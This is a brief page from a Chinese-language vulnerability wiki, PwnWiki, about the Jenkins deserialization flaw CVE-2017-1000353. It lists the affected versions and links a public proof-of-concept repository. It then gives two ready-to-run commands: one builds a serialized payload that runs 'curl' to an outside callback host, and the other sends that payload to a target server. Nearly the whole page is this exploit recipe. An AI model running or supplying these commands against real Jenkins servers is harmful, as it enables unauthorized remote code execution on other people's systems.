pwnwiki.com
,
影响版本
Jenkins<=2.56 Jenkins LTS <= 2.46.1
POC
https://github.com/vulhub/CVE-2017-1000353
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "curl http://xxx.ceye.io"
python exploit.py http://x.x.x.x:8080 jenkins_poc.ser
免费、自由、人人可编辑的漏洞库--PwnWiki.com
